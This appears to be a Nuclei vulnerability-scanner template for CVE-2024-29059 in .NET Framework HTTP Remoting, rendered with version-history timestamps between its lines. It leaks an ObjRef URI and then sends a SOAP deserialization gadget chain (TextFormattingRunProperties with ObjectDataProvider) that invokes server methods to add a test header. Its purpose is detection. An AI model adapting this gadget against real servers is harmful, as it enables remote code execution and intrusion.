2024-03-28 13:17:52 +00:00
|
|
|
id: CVE-2024-29059
|
|
|
|
|
|
|
|
info:
|
2024-03-28 14:40:27 +00:00
|
|
|
name: .NET Framework - Leaking ObjRefs via HTTP .NET Remoting
|
|
|
|
author: iamnoooob,rootxharsh,DhiyaneshDk,pdresearch
|
2024-03-28 13:17:52 +00:00
|
|
|
severity: high
|
|
|
|
description: .NET Framework Information Disclosure Vulnerability
|
|
|
|
reference:
|
|
|
|
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29059
|
|
|
|
- https://code-white.com/blog/leaking-objrefs-to-exploit-http-dotnet-remoting/
|
|
|
|
- https://github.com/codewhitesec/HttpRemotingObjRefLeak
|
|
|
|
classification:
|
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
|
|
cvss-score: 7.5
|
|
|
|
cve-id: CVE-2024-29059
|
|
|
|
epss-score: 0.00043
|
|
|
|
epss-percentile: 0.07503
|
2024-03-28 14:40:27 +00:00
|
|
|
cpe: cpe:2.3:a:microsoft:.net_framework:*:*:*:*:*:*:*:*
|
2024-03-28 13:17:52 +00:00
|
|
|
metadata:
|
2024-03-28 14:40:27 +00:00
|
|
|
max-request: 2
|
|
|
|
shodan-query: 'Server: MS .NET Remoting'
|
|
|
|
vendor: microsoft
|
|
|
|
product: .net_framework
|
2024-03-30 02:16:40 +00:00
|
|
|
tags: cve,cve2024,dotnet,microsoft,remoting,deserialization
|
2024-03-28 13:17:52 +00:00
|
|
|
|
|
|
|
http:
|
|
|
|
- raw:
|
2024-03-28 14:40:27 +00:00
|
|
|
- |
|
2024-03-28 13:17:52 +00:00
|
|
|
GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
__RequestVerb: POST
|
|
|
|
Content-Type: text/xml
|
2024-03-28 13:26:32 +00:00
|
|
|
|
2024-03-28 14:40:27 +00:00
|
|
|
- |
|
|
|
|
POST {{objref}} HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
SOAPAction: ""
|
|
|
|
Content-Type: text/xml
|
2024-03-28 13:17:52 +00:00
|
|
|
|
2024-03-28 14:40:27 +00:00
|
|
|
<SOAP-ENV:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:clr="http://schemas.microsoft.com/soap/encoding/clr/1.0" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
|
|
|
|
<a1:TextFormattingRunProperties id="ref-1" xmlns:a1="http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35">
|
|
|
|
<ForegroundBrush id="ref-3"><ObjectDataProvider MethodName="AddHeader"
|
|
|
|
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
|
|
|
|
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
|
|
|
|
xmlns:System="clr-namespace:System;assembly=mscorlib"
|
|
|
|
xmlns:System.Web="clr-namespace:System.Web;assembly=System.Web"><ObjectDataProvider.ObjectInstance><ObjectDataProvider MethodName="get_Response"><ObjectDataProvider.ObjectInstance>
|
|
|
|
<ObjectDataProvider ObjectType="{x:Type System.Web:HttpContext}" MethodName="get_Current" />
|
|
|
|
</ObjectDataProvider.ObjectInstance>
|
|
|
|
</ObjectDataProvider>
|
|
|
|
</ObjectDataProvider.ObjectInstance>
|
|
|
|
<ObjectDataProvider.MethodParameters>
|
|
|
|
<System:String>X-Vuln-Test</System:String>
|
|
|
|
<System:String>{{randstr}}</System:String>
|
|
|
|
</ObjectDataProvider.MethodParameters>
|
|
|
|
</ObjectDataProvider></ForegroundBrush>
|
|
|
|
</a1:TextFormattingRunProperties>
|
|
|
|
</SOAP-ENV:Envelope>
|
|
|
|
|
|
|
|
extractors:
|
2024-03-28 13:17:52 +00:00
|
|
|
- type: regex
|
2024-03-28 14:40:27 +00:00
|
|
|
name: objref
|
|
|
|
part: body_1
|
|
|
|
group: 1
|
2024-03-28 13:17:52 +00:00
|
|
|
regex:
|
2024-03-28 14:40:27 +00:00
|
|
|
- "(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"
|
|
|
|
internal: true
|
|
|
|
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- x_vuln_test
|
|
|
|
|
|
|
|
matchers:
|
|
|
|
- type: dsl
|
|
|
|
dsl:
|
|
|
|
- "contains(body_1,'ObjRef')"
|
|
|
|
- "contains(x_vuln_test,'{{randstr}}')"
|
2024-03-29 03:22:33 +00:00
|
|
|
condition: and
|
2024-03-30 06:31:44 +00:00
|
|
|
# digest: 490a00463044022075eae4fa0532f3bf10a0c94bd222dc4fd59b85ae03a5e0d02f2cd542a4069e5402206cfa5cdac2a1493b73fd82d8668018e591c958cf6d0dfd4e44786def094a509a:922c64590222798bb761d5b6d8e72950
|